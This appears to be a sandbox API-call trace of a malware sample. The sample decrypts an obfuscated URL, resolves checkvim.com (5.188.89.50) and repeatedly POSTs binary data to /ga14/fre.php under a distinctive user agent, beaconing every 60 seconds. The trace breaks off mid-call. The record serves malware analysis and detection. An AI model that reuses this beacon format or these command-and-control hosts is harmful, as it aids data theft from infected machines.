[0284.103] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871178 | out: hHeap=0x840000) returned 1 [0284.103] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x88c) returned 0x45c [0284.105] Sleep (dwMilliseconds=0xea60) [0284.106] GetProcessHeap () returned 0x840000 [0284.106] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fd88 [0284.107] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0284.108] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0284.116] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0284.116] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0284.141] GetProcessHeap () returned 0x840000 [0284.141] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0284.141] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0284.142] CryptImportKey (in: hProv=0x86f688, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e7f0) returned 1 [0284.143] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0284.143] CryptSetKeyParam (hKey=0x87e7f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0284.144] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0284.144] CryptSetKeyParam (hKey=0x87e7f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0284.144] GetProcessHeap () returned 0x840000 [0284.144] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0284.145] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0284.145] CryptDecrypt (in: hKey=0x87e7f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fd88, pdwDataLen=0x19f9a4 | out: pbData=0x87fd88, pdwDataLen=0x19f9a4) returned 1 [0284.146] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0284.146] CryptDestroyKey (hKey=0x87e7f0) returned 1 [0284.147] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0284.148] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0284.148] GetProcessHeap () returned 0x840000 [0284.148] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x873300 [0284.149] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0284.149] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0284.150] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0284.150] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0284.151] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0284.151] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0284.152] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0284.152] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0284.152] GetProcessHeap () returned 0x840000 [0284.152] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871470 [0284.152] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0284.153] GetProcessHeap () returned 0x840000 [0284.153] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871470 | out: hHeap=0x840000) returned 1 [0284.153] GetProcessHeap () returned 0x840000 [0284.153] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873300 | out: hHeap=0x840000) returned 1 [0284.153] GetProcessHeap () returned 0x840000 [0284.153] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fd88 | out: hHeap=0x840000) returned 1 [0284.153] GetProcessHeap () returned 0x840000 [0284.153] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f710 [0284.154] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0284.154] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0284.166] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0284.166] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x870128) returned 1 [0284.174] GetProcessHeap () returned 0x840000 [0284.174] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0284.175] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0284.176] CryptImportKey (in: hProv=0x870128, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e6f0) returned 1 [0284.176] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0284.177] CryptSetKeyParam (hKey=0x87e6f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0284.178] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0284.179] CryptSetKeyParam (hKey=0x87e6f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0284.179] GetProcessHeap () returned 0x840000 [0284.179] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0284.179] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0284.180] CryptDecrypt (in: hKey=0x87e6f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f710, pdwDataLen=0x19f9a4 | out: pbData=0x87f710, pdwDataLen=0x19f9a4) returned 1 [0284.181] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0284.181] CryptDestroyKey (hKey=0x87e6f0) returned 1 [0284.182] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0284.182] CryptReleaseContext (hProv=0x870128, dwFlags=0x0) returned 1 [0284.182] GetProcessHeap () returned 0x840000 [0284.182] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0284.183] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0284.183] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0284.184] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0284.184] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0284.185] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0284.186] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0284.186] GetProcessHeap () returned 0x840000 [0284.186] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8711a0 [0284.186] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871290*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c80*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0284.188] GetProcessHeap () returned 0x840000 [0284.188] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b58 [0284.188] socket (af=2, type=1, protocol=6) returned 0x460 [0284.189] connect (s=0x460, name=0x878c80*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0284.263] FreeAddrInfoW (pAddrInfo=0x871290*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c80*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0284.263] GetProcessHeap () returned 0x840000 [0284.263] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f688 [0284.263] GetProcessHeap () returned 0x840000 [0284.263] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8825d8 [0284.264] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0284.265] wvsprintfA (in: param_1=0x8825d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0284.265] GetProcessHeap () returned 0x840000 [0284.265] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0284.265] GetProcessHeap () returned 0x840000 [0284.265] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0284.265] GetProcessHeap () returned 0x840000 [0284.265] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f5f0 [0284.265] GetProcessHeap () returned 0x840000 [0284.265] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8825d8 [0284.266] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0284.267] wvsprintfA (in: param_1=0x8825d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0284.267] GetProcessHeap () returned 0x840000 [0284.267] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0284.267] GetProcessHeap () returned 0x840000 [0284.267] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0284.267] send (s=0x460, buf=0x873a58*, len=237, flags=0) returned 237 [0284.268] send (s=0x460, buf=0x87eb58*, len=159, flags=0) returned 159 [0284.268] GetProcessHeap () returned 0x840000 [0284.268] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0284.268] recv (in: s=0x460, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0284.666] GetProcessHeap () returned 0x840000 [0284.666] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0284.666] GetProcessHeap () returned 0x840000 [0284.666] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f5f0 | out: hHeap=0x840000) returned 1 [0284.666] GetProcessHeap () returned 0x840000 [0284.666] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0284.666] GetProcessHeap () returned 0x840000 [0284.666] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f688 | out: hHeap=0x840000) returned 1 [0284.666] closesocket (s=0x460) returned 0 [0284.667] GetProcessHeap () returned 0x840000 [0284.667] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b58 | out: hHeap=0x840000) returned 1 [0284.667] GetProcessHeap () returned 0x840000 [0284.667] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0284.667] GetProcessHeap () returned 0x840000 [0284.667] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f710 | out: hHeap=0x840000) returned 1 [0284.667] GetProcessHeap () returned 0x840000 [0284.667] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8711a0 | out: hHeap=0x840000) returned 1 [0284.672] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x82c) returned 0x460 [0284.706] Sleep (dwMilliseconds=0xea60) [0284.712] GetProcessHeap () returned 0x840000 [0284.712] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f5f0 [0284.713] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0284.713] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0284.725] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0284.725] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0284.733] GetProcessHeap () returned 0x840000 [0284.733] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0284.734] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0284.734] CryptImportKey (in: hProv=0x86f688, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e270) returned 1 [0284.735] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0284.735] CryptSetKeyParam (hKey=0x87e270, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0284.736] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0284.737] CryptSetKeyParam (hKey=0x87e270, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0284.737] GetProcessHeap () returned 0x840000 [0284.737] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0284.737] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0284.738] CryptDecrypt (in: hKey=0x87e270, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f5f0, pdwDataLen=0x19f9a4 | out: pbData=0x87f5f0, pdwDataLen=0x19f9a4) returned 1 [0284.738] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0284.739] CryptDestroyKey (hKey=0x87e270) returned 1 [0284.739] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0284.740] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0284.740] GetProcessHeap () returned 0x840000 [0284.740] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0284.741] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0284.741] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0284.742] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0284.742] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0284.743] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0284.744] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0284.745] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0284.745] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0284.745] GetProcessHeap () returned 0x840000 [0284.745] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871470 [0284.745] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0284.746] GetProcessHeap () returned 0x840000 [0284.746] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871470 | out: hHeap=0x840000) returned 1 [0284.747] GetProcessHeap () returned 0x840000 [0284.747] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0284.747] GetProcessHeap () returned 0x840000 [0284.747] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f5f0 | out: hHeap=0x840000) returned 1 [0284.747] GetProcessHeap () returned 0x840000 [0284.747] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fea8 [0284.747] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0284.748] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0284.754] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0284.754] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fce8) returned 1 [0284.761] GetProcessHeap () returned 0x840000 [0284.761] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0284.762] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0284.763] CryptImportKey (in: hProv=0x86fce8, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e7b0) returned 1 [0284.763] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0284.764] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0284.764] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0284.765] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0284.765] GetProcessHeap () returned 0x840000 [0284.765] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0284.766] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0284.767] CryptDecrypt (in: hKey=0x87e7b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fea8, pdwDataLen=0x19f9a4 | out: pbData=0x87fea8, pdwDataLen=0x19f9a4) returned 1 [0284.767] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0284.768] CryptDestroyKey (hKey=0x87e7b0) returned 1 [0284.768] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0284.769] CryptReleaseContext (hProv=0x86fce8, dwFlags=0x0) returned 1 [0284.769] GetProcessHeap () returned 0x840000 [0284.769] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0284.770] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0284.770] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0284.771] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0284.771] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0284.772] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0284.772] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0284.772] GetProcessHeap () returned 0x840000 [0284.772] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8711a0 [0284.773] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x8713a8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b48*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0284.775] GetProcessHeap () returned 0x840000 [0284.775] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871bd8 [0284.775] socket (af=2, type=1, protocol=6) returned 0x464 [0284.775] connect (s=0x464, name=0x878b48*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0284.840] FreeAddrInfoW (pAddrInfo=0x8713a8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b48*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0284.841] GetProcessHeap () returned 0x840000 [0284.841] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86fce8 [0284.841] GetProcessHeap () returned 0x840000 [0284.841] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8825d8 [0284.843] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0284.856] wvsprintfA (in: param_1=0x8825d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0284.856] GetProcessHeap () returned 0x840000 [0284.856] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0284.856] GetProcessHeap () returned 0x840000 [0284.856] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0284.856] GetProcessHeap () returned 0x840000 [0284.856] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f5f0 [0284.856] GetProcessHeap () returned 0x840000 [0284.856] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8825d8 [0284.857] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0284.858] wvsprintfA (in: param_1=0x8825d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0284.858] GetProcessHeap () returned 0x840000 [0284.858] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0284.858] GetProcessHeap () returned 0x840000 [0284.858] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0284.858] send (s=0x464, buf=0x873a58*, len=237, flags=0) returned 237 [0284.859] send (s=0x464, buf=0x87eb58*, len=159, flags=0) returned 159 [0284.859] GetProcessHeap () returned 0x840000 [0284.859] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0284.859] recv (in: s=0x464, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0285.241] GetProcessHeap () returned 0x840000 [0285.241] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0285.241] GetProcessHeap () returned 0x840000 [0285.241] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f5f0 | out: hHeap=0x840000) returned 1 [0285.241] GetProcessHeap () returned 0x840000 [0285.241] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0285.242] GetProcessHeap () returned 0x840000 [0285.242] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86fce8 | out: hHeap=0x840000) returned 1 [0285.242] closesocket (s=0x464) returned 0 [0285.277] GetProcessHeap () returned 0x840000 [0285.277] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871bd8 | out: hHeap=0x840000) returned 1 [0285.277] GetProcessHeap () returned 0x840000 [0285.277] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0285.277] GetProcessHeap () returned 0x840000 [0285.278] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fea8 | out: hHeap=0x840000) returned 1 [0285.278] GetProcessHeap () returned 0x840000 [0285.278] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8711a0 | out: hHeap=0x840000) returned 1 [0285.283] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x880) returned 0x464 [0285.323] Sleep (dwMilliseconds=0xea60) [0285.326] GetProcessHeap () returned 0x840000 [0285.326] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f5f0 [0285.348] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0285.349] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0285.356] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0285.356] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0285.364] GetProcessHeap () returned 0x840000 [0285.364] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0285.364] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0285.365] CryptImportKey (in: hProv=0x86f688, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e3b0) returned 1 [0285.365] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0285.366] CryptSetKeyParam (hKey=0x87e3b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0285.366] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0285.367] CryptSetKeyParam (hKey=0x87e3b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0285.367] GetProcessHeap 